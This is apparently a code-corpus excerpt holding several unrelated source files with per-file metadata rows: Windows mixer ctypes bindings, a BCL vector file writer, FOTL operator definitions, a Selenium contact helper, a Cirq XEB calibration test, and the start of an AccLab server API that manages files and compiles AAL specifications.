MIXERCONTROL_CT_CLASS_MASK = 4026531840L # Variable c_ulong '-268435456ul'
MIXERCONTROL_CT_CLASS_FADER = 1342177280 # Variable c_long '1342177280l'
MIXERCONTROL_CONTROLTYPE_VOLUME = 1342373889 # Variable c_long '1342373889l'
MIXERCONTROL_CONTROLTYPE_BASS = 1342373890 # Variable c_long '1342373890l'
MIXERCONTROL_CONTROLTYPE_TREBLE = 1342373891 # Variable c_long '1342373891l'
MIXERCONTROL_CONTROLTYPE_EQUALIZER = 1342373892 # Variable c_long '1342373892l'
MIXERCONTROL_CONTROLTYPE_FADER = 1342373888 # Variable c_long '1342373888l'
MIXERCONTROL_CT_CLASS_LIST = 1879048192 # Variable c_long '1879048192l'
MIXERCONTROL_CONTROLTYPE_SINGLESELECT = 1879113728 # Variable c_long '1879113728l'
MIXERCONTROL_CONTROLTYPE_MULTIPLESELECT = 1895890944 # Variable c_long '1895890944l'
MIXERCONTROL_CONTROLTYPE_MUX = 1879113729 # Variable c_long '1879113729l'
MIXERCONTROL_CONTROLTYPE_MIXER = 1895890945 # Variable c_long '1895890945l'
MIXERCONTROL_CT_CLASS_METER = 268435456 # Variable c_long '268435456l'
MIXERCONTROL_CONTROLTYPE_BOOLEANMETER = 268500992 # Variable c_long '268500992l'
MIXERCONTROL_CONTROLTYPE_PEAKMETER = 268566529 # Variable c_long '268566529l'
MIXERCONTROL_CONTROLTYPE_SIGNEDMETER = 268566528 # Variable c_long '268566528l'
MIXERCONTROL_CONTROLTYPE_UNSIGNEDMETER = 268632064 # Variable c_long '268632064l'
MIXERCONTROL_CT_CLASS_NUMBER = 805306368 # Variable c_long '805306368l'
MIXERCONTROL_CONTROLTYPE_SIGNED = 805437440 # Variable c_long '805437440l'
MIXERCONTROL_CONTROLTYPE_UNSIGNED = 805502976 # Variable c_long '805502976l'
MIXERCONTROL_CONTROLTYPE_PERCENT = 805634048 # Variable c_long '805634048l'
MIXERCONTROL_CONTROLTYPE_DECIBELS = 805568512 # Variable c_long '805568512l'
MIXERCONTROL_CT_CLASS_SLIDER = 1073741824 # Variable c_long '1073741824l'
MIXERCONTROL_CONTROLTYPE_SLIDER = 1073872896 # Variable c_long '1073872896l'
MIXERCONTROL_CONTROLTYPE_PAN = 1073872897 # Variable c_long '1073872897l'
MIXERCONTROL_CONTROLTYPE_QSOUNDPAN = 1073872898 # Variable c_long '1073872898l'
MIXERCONTROL_CT_CLASS_SWITCH = 536870912 # Variable c_long '536870912l'
MIXERCONTROL_CONTROLTYPE_BOOLEAN = 536936448 # Variable c_long '536936448l'
MIXERCONTROL_CONTROLTYPE_BUTTON = 553713664 # Variable c_long '553713664l'
MIXERCONTROL_CONTROLTYPE_LOUDNESS = 536936452 # Variable c_long '536936452l'
MIXERCONTROL_CONTROLTYPE_MONO = 536936451 # Variable c_long '536936451l'
MIXERCONTROL_CONTROLTYPE_MUTE = 536936450 # Variable c_long '536936450l'
MIXERCONTROL_CONTROLTYPE_ONOFF = 536936449 # Variable c_long '536936449l'
MIXERCONTROL_CONTROLTYPE_STEREOENH = 536936453 # Variable c_long '536936453l'
MIXERCONTROL_CT_CLASS_TIME = 1610612736 # Variable c_long '1610612736l'
MIXERCONTROL_CONTROLTYPE_MICROTIME = 1610809344 # Variable c_long '1610809344l'
MIXERCONTROL_CONTROLTYPE_MILLITIME = 1627586560 # Variable c_long '1627586560l'
MIXERCONTROL_CT_CLASS_CUSTOM = 0 # Variable c_long '0l'
MIXERCONTROL_CONTROLTYPE_CUSTOM = 0 # Variable c_long '0l'
class tMIXERCONTROLDETAILS_UNSIGNED(Structure):
pass
MIXERCONTROLDETAILS_UNSIGNED = tMIXERCONTROLDETAILS_UNSIGNED
tMIXERCONTROLDETAILS_UNSIGNED._pack_ = 1
tMIXERCONTROLDETAILS_UNSIGNED._fields_ = [
('dwValue', DWORD),
]
class tMIXERCONTROLDETAILS_SIGNED(Structure):
pass
MIXERCONTROLDETAILS_SIGNED = tMIXERCONTROLDETAILS_SIGNED
tMIXERCONTROLDETAILS_SIGNED._pack_ = 1
tMIXERCONTROLDETAILS_SIGNED._fields_ = [
('lValue', LONG),
]
class tMIXERCONTROLDETAILS_BOOLEAN(Structure):
pass
MIXERCONTROLDETAILS_BOOLEAN = tMIXERCONTROLDETAILS_BOOLEAN
tMIXERCONTROLDETAILS_BOOLEAN._pack_ = 1
tMIXERCONTROLDETAILS_BOOLEAN._fields_ = [
('fValue', LONG),
]
class tagMIXERCONTROLDETAILS_LISTTEXTW(Structure):
pass
MIXERCONTROLDETAILS_LISTTEXTW = tagMIXERCONTROLDETAILS_LISTTEXTW
MIXERCONTROLDETAILS_LISTTEXT = MIXERCONTROLDETAILS_LISTTEXTW
tagMIXERCONTROLDETAILS_LISTTEXTW._pack_ = 1
tagMIXERCONTROLDETAILS_LISTTEXTW._fields_ = [
('dwParam1', DWORD),
('dwParam2', DWORD),
('szName', WCHAR * 64),
]
MIXERCONTROL_CONTROLF_DISABLED = 2147483648L # Variable c_ulong '-2147483648ul'
MIXERCONTROL_CONTROLF_MULTIPLE = 2 # Variable c_long '2l'
MIXERCONTROL_CONTROLF_UNIFORM = 1 # Variable c_long '1l'
MMSYSERR_NOERROR = 0 # Variable c_int '0'
class tagMIXERCAPSW(Structure):
pass
MIXERCAPSW = tagMIXERCAPSW
MIXERCAPS = MIXERCAPSW
MMVERSION = UINT
tagMIXERCAPSW._pack_ = 1
tagMIXERCAPSW._fields_ = [
('wMid', WORD),
('wPid', WORD),
('vDriverVersion', MMVERSION),
('szPname', WCHAR * 32),
('fdwSupport', DWORD),
('cDestinations', DWORD),
]
class tagMIXERLINEW(Structure):
pass
MIXERLINEW = tagMIXERLINEW
MIXERLINE = MIXERLINEW
class N13tagMIXERLINEW5DOLLAR_112E(Structure):
pass
N13tagMIXERLINEW5DOLLAR_112E._pack_ = 1
N13tagMIXERLINEW5DOLLAR_112E._fields_ = [
('dwType', DWORD),
('dwDeviceID', DWORD),
('wMid', WORD),
('wPid', WORD),
('vDriverVersion', MMVERSION),
('szPname', WCHAR * 32),
]
tagMIXERLINEW._pack_ = 1
tagMIXERLINEW._fields_ = [
('cbStruct', DWORD),
('dwDestination', DWORD),
('dwSource', DWORD),
('dwLineID', DWORD),
('fdwLine', DWORD),
('dwUser', DWORD_PTR),
('dwComponentType', DWORD),
('cChannels', DWORD),
('cConnections', DWORD),
('cControls', DWORD),
('szShortName', WCHAR * 16),
('szName', WCHAR * 64),
('Target', N13tagMIXERLINEW5DOLLAR_112E),
]
class tagMIXERCONTROLW(Structure):
pass
MIXERCONTROLW = tagMIXERCONTROLW
MIXERCONTROL = MIXERCONTROLW
class N16tagMIXERCONTROLW5DOLLAR_117E(Union):
pass
class N16tagMIXERCONTROLW5DOLLAR_1175DOLLAR_118E(Structure):
pass
N16tagMIXERCONTROLW5DOLLAR_1175DOLLAR_118E._pack_ = 1
N16tagMIXERCONTROLW5DOLLAR_1175DOLLAR_118E._fields_ = [
('lMinimum', LONG),
('lMaximum', LONG),
]
class N16tagMIXERCONTROLW5DOLLAR_1175DOLLAR_119E(Structure):
pass
N16tagMIXERCONTROLW5DOLLAR_1175DOLLAR_119E._pack_ = 1
N16tagMIXERCONTROLW5DOLLAR_1175DOLLAR_119E._fields_ = [
('dwMinimum', DWORD),
('dwMaximum', DWORD),
]
N16tagMIXERCONTROLW5DOLLAR_117E._pack_ = 1
N16tagMIXERCONTROLW5DOLLAR_117E._anonymous_ = ['_0', '_1']
N16tagMIXERCONTROLW5DOLLAR_117E._fields_ = [
('_0', N16tagMIXERCONTROLW5DOLLAR_1175DOLLAR_118E),
('_1', N16tagMIXERCONTROLW5DOLLAR_1175DOLLAR_119E),
('dwReserved', DWORD * 6),
]
class N16tagMIXERCONTROLW5DOLLAR_120E(Union):
pass
N16tagMIXERCONTROLW5DOLLAR_120E._pack_ = 1
N16tagMIXERCONTROLW5DOLLAR_120E._fields_ = [
('cSteps', DWORD),
('cbCustomData', DWORD),
('dwReserved', DWORD * 6),
]
tagMIXERCONTROLW._pack_ = 1
tagMIXERCONTROLW._fields_ = [
('cbStruct', DWORD),
('dwControlID', DWORD),
('dwControlType', DWORD),
('fdwControl', DWORD),
('cMultipleItems', DWORD),
('szShortName', WCHAR * 16),
('szName', WCHAR * 64),
('Bounds', N16tagMIXERCONTROLW5DOLLAR_117E),
('Metrics', N16tagMIXERCONTROLW5DOLLAR_120E),
]
class tagMIXERLINECONTROLSW(Structure):
pass
MIXERLINECONTROLSW = tagMIXERLINECONTROLSW
MIXERLINECONTROLS = MIXERLINECONTROLSW
class N21tagMIXERLINECONTROLSW5DOLLAR_122E(Union):
pass
N21tagMIXERLINECONTROLSW5DOLLAR_122E._pack_ = 1
N21tagMIXERLINECONTROLSW5DOLLAR_122E._fields_ = [
('dwControlID', DWORD),
('dwControlType', DWORD),
]
LPMIXERCONTROLW = POINTER(tagMIXERCONTROLW)
tagMIXERLINECONTROLSW._pack_ = 1
tagMIXERLINECONTROLSW._anonymous_ = ['_0']
tagMIXERLINECONTROLSW._fields_ = [
('cbStruct', DWORD),
('dwLineID', DWORD),
('_0', N21tagMIXERLINECONTROLSW5DOLLAR_122E),
('cControls', DWORD),
('cbmxctrl', DWORD),
('pamxctrl', LPMIXERCONTROLW),
]
class tMIXERCONTROLDETAILS(Structure):
pass
MIXERCONTROLDETAILS = tMIXERCONTROLDETAILS
class N20tMIXERCONTROLDETAILS5DOLLAR_123E(Union):
pass
N20tMIXERCONTROLDETAILS5DOLLAR_123E._pack_ = 1
N20tMIXERCONTROLDETAILS5DOLLAR_123E._fields_ = [
('hwndOwner', HWND),
('cMultipleItems', DWORD),
]
tMIXERCONTROLDETAILS._pack_ = 1
tMIXERCONTROLDETAILS._anonymous_ = ['_0']
tMIXERCONTROLDETAILS._fields_ = [
('cbStruct', DWORD),
('dwControlID', DWORD),
('cChannels', DWORD),
('_0', N20tMIXERCONTROLDETAILS5DOLLAR_123E),
('cbDetails', DWORD),
('paDetails', LPVOID),
]
HMIXER = HANDLE
MMRESULT = UINT
LPHMIXER = POINTER(HMIXER)
mixerOpen = _Winmm.mixerOpen
mixerOpen.restype = MMRESULT
mixerOpen.argtypes = [LPHMIXER, UINT, DWORD_PTR, DWORD_PTR, DWORD]
LPMIXERCAPSW = POINTER(tagMIXERCAPSW)
mixerGetDevCapsW = _Winmm.mixerGetDevCapsW
mixerGetDevCapsW.restype = MMRESULT
mixerGetDevCapsW.argtypes = [UINT_PTR, LPMIXERCAPSW, UINT]
mixerGetDevCaps = mixerGetDevCapsW # alias
HMIXEROBJ = HANDLE
LPMIXERLINEW = POINTER(tagMIXERLINEW)
mixerGetLineInfoW = _Winmm.mixerGetLineInfoW
mixerGetLineInfoW.restype = MMRESULT
mixerGetLineInfoW.argtypes = [HMIXEROBJ, LPMIXERLINEW, DWORD]
mixerGetLineInfo = mixerGetLineInfoW # alias
LPMIXERLINECONTROLSW = POINTER(tagMIXERLINECONTROLSW)
mixerGetLineControlsW = _Winmm.mixerGetLineControlsW
mixerGetLineControlsW.restype = MMRESULT
mixerGetLineControlsW.argtypes = [HMIXEROBJ, LPMIXERLINECONTROLSW, DWORD]
mixerGetLineControls = mixerGetLineControlsW # alias
LPMIXERCONTROLDETAILS = POINTER(tMIXERCONTROLDETAILS)
mixerGetControlDetailsW = _Winmm.mixerGetControlDetailsW
mixerGetControlDetailsW.restype = MMRESULT
mixerGetControlDetailsW.argtypes = [HMIXEROBJ, LPMIXERCONTROLDETAILS, DWORD]
mixerGetControlDetails = mixerGetControlDetailsW # alias
MIXER_GETLINEINFOF_DESTINATION = 0 # Variable c_long '0l'
MIXER_GETLINEINFOF_SOURCE = 1 # Variable c_long '1l'
MIXER_GETLINECONTROLSF_ALL = 0 # Variable c_long '0l'
MIXER_GETLINECONTROLSF_ONEBYID = 1 # Variable c_long '1l'
MIXER_GETCONTROLDETAILSF_VALUE = 0 # Variable c_long '0l'
MIXER_GETCONTROLDETAILSF_LISTTEXT = 1 # Variable c_long '1l'
mixerGetNumDevs = _Winmm.mixerGetNumDevs
mixerGetNumDevs.restype = UINT
mixerGetNumDevs.argtypes = []
mixerSetControlDetails = _Winmm.mixerSetControlDetails
mixerSetControlDetails.restype = MMRESULT
mixerSetControlDetails.argtypes = [HMIXEROBJ, LPMIXERCONTROLDETAILS, DWORD]
MIXERLINE_COMPONENTTYPE_DST_SPEAKERS = 4 # Variable c_long '4l'
MIXER_GETLINEINFOF_COMPONENTTYPE = 3 # Variable c_long '3l'
MIXER_GETLINECONTROLSF_ONEBYTYPE = 2 # Variable c_long '2l'
|
gpl-2.0
| -8,111,707,828,437,590,000
| 38.973333
| 85
| 0.737241
| false
| 2.882
| false
| false
| false
|
decarboxy/py_protein_utils
|
rosettautil/bcl/file_formats.py
|
1
|
1538
|
from rosettautil.util import fileutil
import sys
class list_of_2D_vectors:
def __init__(self):
self.records = []
def add_record(self, first_col,second_col):
self.records.append((first_col,second_col))
def write_bcl_file(self,path):
out_file = fileutil.universal_open(path,'w')
list_header ="bcl::storage::List<bcl::storage::VectorND2<bcl::math::Vector<double>>>"
vector_header = "bcl::storage::VectorND2<bcl::math::Vector<double>>"
double_header = "bcl::math::Vector<double>"
out_file.write(list_header+"\n")
out_file.write(str(len(self.records))+"\n")
for first_col, second_col in self.records:
out_file.write(vector_header+"\n")
out_file.write(double_header+"\n")
out_file.write(str(1)+"\n")
out_file.write(str(first_col)+"\n")
out_file.write(double_header+"\n")
out_file.write(str(1)+"\n")
out_file.write(str(second_col)+"\n")
out_file.close()
def read_bcl_file(self,path):
print "This function doesn't work yet"
sys.exit()
out_file = fileutil.universal_open(path,'r')
list_header ="bcl::storage::List<bcl::storage::VectorND2<bcl::math::Vector<double>>>"
vector_header = "bcl::storage::VectorND2<bcl::math::Vector<double>>"
double_header = "bcl::math::Vector<double>"
list_scope = False
vector_scope = False
double_scope = False
|
mit
| 748,329,537,673,460,700
| 37.475
| 93
| 0.576723
| false
| 3.402655
| false
| false
| false
|
hkff/AccLab
|
pyAAL/FOTLOperators.py
|
1
|
1135
|
"""
FOTLOperators
Copyright (C) 2014 Walid Benghabrit
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
__author__ = 'walid'
from enum import Enum
# FOTL operators
class FOTLOperators(Enum):
"""
Fotl operators in tspass syntax
"""
t_equal = '='
t_not = '~'
t_and = '&'
t_or = '|'
t_implication = '=>'
t_equivalence = '<=>'
t_forall = '!'
t_exists = '?'
t_always = 'always'
t_next = 'next'
t_sometime = 'sometime'
t_until = 'until'
t_unless = 'unless'
def __str__(self):
return self.value
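# A hedged usage sketch (not part of the original module):
#   >>> str(FOTLOperators.t_implication)
#   '=>'
#   >>> str(FOTLOperators.t_always)
#   'always'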
|
gpl-3.0
| -7,398,909,174,859,723,000
| 25.395349
| 69
| 0.671366
| false
| 3.603175
| false
| false
| false
|
pbrandebura/Task1
|
fixture/contact.py
|
1
|
4977
|
from model.contact import Contact
class ContactHelper:
def __init__(self, app):
self.app = app
def back_to_homepage(self):
wd = self.app.wd
if not len(wd.find_elements_by_name("Send e-Mail")) > 0:
wd.find_element_by_link_text("home").click()
def proceed_to_newuser_page(self):
wd = self.app.wd
if not (wd.current_url.endswith("/edit.php") and len(wd.find_elements_by_name("Enter")) > 0):
wd.find_element_by_link_text("add new").click()
def add_new_user(self, contact):
wd = self.app.wd
# add new contact
self.proceed_to_newuser_page()
# enter details
self.entering_details(contact)
# submit
wd.find_element_by_xpath("//div[@id='content']/form/input[21]").click()
self.back_to_homepage()
self.contact_cache = None
def select_contact_by_index(self, index):
wd = self.app.wd
wd.find_elements_by_name("selected[]")[index].click()
def edit_first_user(self):
wd = self.app.wd
self.edit_user_by_index(0)
def edit_user_by_index(self, index, contact):
wd = self.app.wd
self.back_to_homepage()
        # edit existing contact
self.select_contact_by_index(index)
wd.find_element_by_xpath("//*[@id='maintable']/tbody/tr["+str(index+2)+"]/td[8]/a/img").click()
# enter details
self.entering_details(contact)
# submit
wd.find_element_by_name("update").click()
self.back_to_homepage()
self.contact_cache = None
def delete_first_contact(self):
self.delete_contact_by_index(0)
def delete_contact_by_index(self, index):
wd = self.app.wd
self.select_contact_by_index(index)
wd.find_element_by_xpath("//*[@id='content']/form[2]/div[2]/input").click()
wd.switch_to_alert().accept()
self.contact_cache = None
def entering_details(self, contact):
wd = self.app.wd
self.type("firstname", contact.firstname)
self.type("middlename", contact.middlename)
self.type("lastname", contact.lastname)
self.type("nickname", contact.nickname)
self.type("title", contact.usertitle)
self.type("company", contact.company)
self.type("address", contact.userAddress)
self.type("home", contact.homeNumber)
self.type("mobile", contact.mobileNumber)
self.type("work", contact.workNumber)
self.type("fax", contact.faxNumber)
self.type("email", contact.userEmail)
self.type("email2", contact.userEmail2)
self.type("email3", contact.userEmail3)
self.type("homepage", contact.userHomepage)
if not wd.find_element_by_xpath("//div[@id='content']/form/select[1]//option[%s]" % contact.bday).is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[1]//option[%s]" % contact.bday).click()
if not wd.find_element_by_xpath(
"//div[@id='content']/form/select[2]//option[%s]" % contact.bmonth).is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[2]//option[%s]" % contact.bmonth).click()
self.type("byear", contact.byear)
if not wd.find_element_by_xpath("//div[@id='content']/form/select[3]//option[%s]" % contact.aday).is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[3]//option[%s]" % contact.aday).click()
if not wd.find_element_by_xpath(
"//div[@id='content']/form/select[4]//option[%s]" % contact.amonth).is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[4]//option[%s]" % contact.amonth).click()
self.type("ayear", contact.ayear)
self.type("address2", contact.userAddress2)
self.type("phone2", contact.userPhone2)
self.type("notes", contact.userNotes)
def type(self, field_name, text):
wd = self.app.wd
if text is not None:
wd.find_element_by_name(field_name).click()
wd.find_element_by_name(field_name).clear()
wd.find_element_by_name(field_name).send_keys(text)
def count(self):
wd = self.app.wd
self.back_to_homepage()
return len(wd.find_elements_by_name("selected[]"))
contact_cache = None
def get_contact_list(self):
if self.contact_cache is None:
wd = self.app.wd
self.back_to_homepage()
self.contact_cache = []
for element in wd.find_elements_by_name("entry"):
cells = element.find_elements_by_tag_name("td")
last_name = cells[1].text
first_name = cells[2].text
id = element.find_element_by_name("selected[]").get_attribute("value")
self.contact_cache.append(Contact(firstname=first_name, lastname=last_name, id=id))
return list(self.contact_cache)
|
apache-2.0
| 7,543,241,541,158,560,000
| 40.831933
| 120
| 0.593731
| false
| 3.446676
| false
| false
| false
|
quantumlib/Cirq
|
cirq-google/cirq_google/calibration/xeb_wrapper_test.py
|
1
|
4677
|
# Copyright 2021 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import multiprocessing.pool
import numpy as np
import pandas as pd
import pytest
import scipy.optimize
import scipy.optimize._minimize
import cirq
import cirq_google as cg
from cirq.experiments import random_rotations_between_grid_interaction_layers_circuit
from cirq.experiments.xeb_fitting import XEBPhasedFSimCharacterizationOptions
from cirq_google.calibration.phased_fsim import (
LocalXEBPhasedFSimCalibrationOptions,
LocalXEBPhasedFSimCalibrationRequest,
)
from cirq_google.calibration.xeb_wrapper import (
run_local_xeb_calibration,
_maybe_multiprocessing_pool,
)
SQRT_ISWAP = cirq.ISWAP ** -0.5
def _minimize_patch(
fun,
x0,
args=(),
method=None,
jac=None,
hess=None,
hessp=None,
bounds=None,
constraints=(),
tol=None,
callback=None,
options=None,
x0_should_be=None,
):
assert method == 'nelder-mead'
np.testing.assert_allclose(x0_should_be, x0)
return scipy.optimize.OptimizeResult(
fun=0,
nit=0,
nfev=0,
status=0,
success=True,
message='monkeypatched',
x=x0.copy(),
final_simplex=None,
)
def _benchmark_patch(*args, **kwargs):
return pd.DataFrame()
@pytest.mark.parametrize(
['fsim_options', 'x0_should_be'],
[
(
XEBPhasedFSimCharacterizationOptions(
characterize_zeta=True,
characterize_gamma=True,
characterize_chi=True,
characterize_theta=False,
characterize_phi=False,
),
[0.0, 0.0, 0.0],
),
(XEBPhasedFSimCharacterizationOptions(), [np.pi / 4, 0.0, 0.0, 0.0, 0.0]),
(
XEBPhasedFSimCharacterizationOptions(
characterize_zeta=True,
characterize_chi=True,
characterize_gamma=True,
characterize_theta=False,
characterize_phi=False,
theta_default=99,
zeta_default=0.1,
chi_default=0.2,
gamma_default=0.3,
phi_default=99,
),
[0.1, 0.2, 0.3],
),
],
)
def test_run_calibration(monkeypatch, fsim_options, x0_should_be):
def _minimize_patch_2(*args, **kwargs):
return _minimize_patch(*args, **kwargs, x0_should_be=x0_should_be)
monkeypatch.setattr('cirq.experiments.xeb_fitting.scipy.optimize.minimize', _minimize_patch_2)
monkeypatch.setattr(
'cirq_google.calibration.xeb_wrapper.xebf.benchmark_2q_xeb_fidelities', _benchmark_patch
)
qubit_indices = [
(0, 5),
(0, 6),
(1, 6),
(2, 6),
]
qubits = [cirq.GridQubit(*idx) for idx in qubit_indices]
sampler = cirq.ZerosSampler()
circuits = [
random_rotations_between_grid_interaction_layers_circuit(
qubits,
depth=depth,
two_qubit_op_factory=lambda a, b, _: SQRT_ISWAP.on(a, b),
pattern=cirq.experiments.GRID_ALIGNED_PATTERN,
seed=10,
)
for depth in [5, 10]
]
options = LocalXEBPhasedFSimCalibrationOptions(
fsim_options=fsim_options,
n_processes=1,
)
characterization_requests = []
for circuit in circuits:
_, characterization_requests = cg.prepare_characterization_for_moments(
circuit, options=options, initial=characterization_requests
)
assert len(characterization_requests) == 2
for cr in characterization_requests:
assert isinstance(cr, LocalXEBPhasedFSimCalibrationRequest)
characterizations = [
run_local_xeb_calibration(request, sampler) for request in characterization_requests
]
final_params = dict()
for c in characterizations:
final_params.update(c.parameters)
assert len(final_params) == 3 # pairs
def test_maybe_pool():
with _maybe_multiprocessing_pool(1) as pool:
assert pool is None
with _maybe_multiprocessing_pool(2) as pool:
assert isinstance(pool, multiprocessing.pool.Pool)
|
apache-2.0
| -5,539,152,799,729,527,000
| 28.049689
| 98
| 0.633526
| false
| 3.556654
| false
| false
| false
|
hkff/AccLab
|
pyAAL/ui/api.py
|
1
|
22847
|
"""
Server API
Copyright (C) 2014 Walid Benghabrit
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from threading import Thread
from time import sleep
try:
from fodtlmon.fodtl.fodtlmon import *
except:
pass
__author__ = 'walid'
import os
from urllib.parse import *
import sys, shutil
from io import StringIO
from aalc import *
from AALtoAccmon import *
import json
base_dir = "examples"
ALLOWED_CMD = ["tspass", "aalc.py", "fotl-translate", "manage.py"]
# Filter ps
def is_cmd_allowed(cmds):
for x in ALLOWED_CMD:
if x in cmds:
return True
return False
# List dir
def api_list_dir(wpath):
tmp = "["
dirs = sorted(os.listdir(wpath)[::-1])
for d in dirs:
if d.startswith("."):
continue
tmp += '{' + '"id":"' + wpath+'/'+d + '", "text":"' + d + '"," iconCls":""'
if os.path.isdir(wpath + "/" + d):
tmp += ',"children": '
tmp += api_list_dir(wpath + '/' + d)
tmp += '},'
if tmp[-1] == ",":
tmp = tmp[:-1]
tmp += ']'
return tmp
# Read file
def api_read_file(f):
with open(base_dir + "/" + f) as fd:
return fd.read()
# Get template
def api_get_template(f):
with open(f) as fd:
return fd.read()
# Write file
def api_write_file(f, d):
res = -1
creation = False
# Add \n at the end
if d[-1] != "\n":
d += "\n"
if not os.path.isfile(base_dir + "/" + f):
creation = True
with open(base_dir + "/" + f, "w+") as fd:
res = str(fd.write(d))
check_aal_acd(f)
if creation:
Popen(['svn', "add", base_dir + "/" + f]).wait()
Popen(['svn', "commit", base_dir + "/", "-m", "'Add file %s'" % f]).wait()
else:
Popen(['svn', "commit", base_dir + "/", "-m", "'Edit file %s'" % f]).wait()
return res
# Rename file
def api_rename_file(f, new_name):
# TODO svn
os.rename(base_dir + "/" + f, base_dir + "/" + new_name)
return "RENAMED"
# Delete file
def api_delete_file(f):
file = base_dir + "/" + f
if os.path.isfile(file):
os.remove(file)
Popen(['svn', "del", file]).wait()
Popen(['svn', "commit", base_dir + "/", "-m", "'Delete file %s'" % f]).wait()
elif os.path.isdir(file):
shutil.rmtree(file)
Popen(['svn', "del", file]).wait()
Popen(['svn', "commit", base_dir + "/", "-m", "'Delete folder %s'" % f]).wait()
return "DELETED"
# Save preferences
def api_save_prefs(d):
# Add \n at the end
if d[-1] != "\n":
d += "\n"
with open("ui/prefs.json", "w+") as fd:
return str(fd.write(d))
# Load preferences
def api_load_prefs():
if not os.path.isfile("ui/prefs.json"):
api_save_prefs('{"theme": "monokai", "username": "", "fontSize": 14, "recentFiles": [] }')
with open("ui/prefs.json") as fd:
return fd.read()
# Create Folder
def api_create_folder(d):
if not os.path.exists(base_dir + "/" + d):
res = str(os.makedirs(base_dir + "/" + d))
Popen(['svn', "add", base_dir + "/" + d]).wait()
Popen(['svn', "commit", base_dir + "/", "-m", "'Add folder %s'" % d]).wait()
return res
else:
return "Directory exists !"
# Convert terminal colors to colored div
def to_html_colors(html_code: str):
html_code = html_code.replace("[91m[ERROR]", "<b style='color:red;'><span class='fa fa-times-circle' "
"style='padding-top: 2px;padding-right: 5px;'/>[ERROR]")
html_code = html_code.replace("[93m[WARNING]", "<b style='color:orange;'><span class='fa fa-exclamation-triangle'"
" style='padding-top: 2px;padding-right: 5px;'/>[WARNING]")
html_code = html_code.replace("[95mat line", "<b style='color:magenta; text-decoration: underline; "
"cursor: pointer;' class='aceLine'>at line")
html_code = html_code.replace("[91m", "<b style='color:red;'><span class='' style='padding-top: 2px;'/>")
html_code = html_code.replace("[93m", "<b style='color:orange;'><span class='' style='padding-top: 2px;'/>")
html_code = html_code.replace("[92m", "<b style='color:green;'><span class='fa fa-exclamation-triangles' "
"style='padding-top: 2px;'/>")
html_code = html_code.replace("[95m", "<b style='color:magenta;'><span class='fa fa-exclamation-triangles' "
"style='padding-top: 2px;'/>")
html_code = html_code.replace("[94m", "<b style='color:blue;'><span class='' style='padding-top: 2px;'/>")
html_code = html_code.replace("[39m", "</b>")
html_code = html_code.replace("<<", "<<")
html_code = html_code.replace(">>", ">>")
return html_code
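# A hedged sketch (not part of the original module): a log line carrying the
# red colour marker handled above, e.g. "...[ERROR] boom...", comes back
# wrapped in "<b style='color:red;'> ... </b>" markup for the web console.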
# Compile AAL
def api_compile_aal(f):
# Save current context
sysout = sys.stdout
syserr = sys.stderr
# Capture the output
reportSIO = StringIO()
reportEIO = StringIO()
sys.stdout = reportSIO
sys.stderr = reportEIO
res = ""
try:
aalc(base_dir + "/" + f, libs_path="libs/aal/", root_path="", web=True)
except Exception as e:
res = "Compilation Error : " + str(e)
res = reportSIO.getvalue() + "\n" + reportEIO.getvalue()
# Restore context
sys.stdout = sysout
sys.stderr = syserr
print(res)
res = to_html_colors(res)
return res.replace("\n", "<br>")
# Compile tspass
def api_compile_tspass(f):
# Save current context
sysout = sys.stdout
syserr = sys.stderr
# Capture the output
reportSIO = StringIO()
reportEIO = StringIO()
sys.stdout = reportSIO
sys.stderr = reportEIO
try:
res = tspassc(file=base_dir + "/" + f, output="tmp.tspass")["print"]
except Exception as e:
res = "Compilation Error : " + str(e)
res += "\n" + reportSIO.getvalue() + "\n" + reportEIO.getvalue()
print(res)
# Restore context
sys.stdout = sysout
sys.stderr = syserr
return res.replace("\n", "<br>")
# Compile ACD
def api_compile_acd(aal, spec):
result = {"compliance": [], "sat": [], "error": ""}
tmp_file = "_tmp0001_.aal"
res = ""
try:
# Save current context
sysout = sys.stdout
syserr = sys.stderr
# Capture the output
reportSIO = StringIO()
reportEIO = StringIO()
sys.stdout = reportSIO
sys.stderr = reportEIO
api_write_file(tmp_file, aal)
res = aalc(base_dir + "/" + tmp_file, libs_path="libs/aal/", root_path="", web=False)
# Handling Sat
for c in res["mm"].aalprog.clauses:
clause = str(c.name)
tmp = validate2(res["mm"], "(always (" + c.usage.to_ltl() + "))", check=True)
result["sat"].append({clause: tmp["sat"]})
# Handling Compliance
specs = spec.split(";")
for x in specs:
x = x.strip()
sp = x.split("->")
if len(sp) == 2:
_c1 = res["mm"].clause(sp[0].strip())
_c2 = res["mm"].clause(sp[1].strip())
tmp = validate(res["mm"], _c1, _c2, resolve=False, verbose=False, use_always=False, acc_formula=0, chk='neg')
result["compliance"].append({x: tmp["ok"]})
res = reportSIO.getvalue() + "\n" + reportEIO.getvalue()
# Restore context
sys.stdout = sysout
sys.stderr = syserr
except Exception as e:
result["error"] += "\nCompilation Error : " + str(e) + "\n"
finally:
result["error"] += res
result["error"] = to_html_colors(result["error"].replace("\n", "</br>"))
api_delete_file(tmp_file)
return json.dumps(result)
# Get AAL declaration in JSON format
def api_get_aal_dec(f):
try:
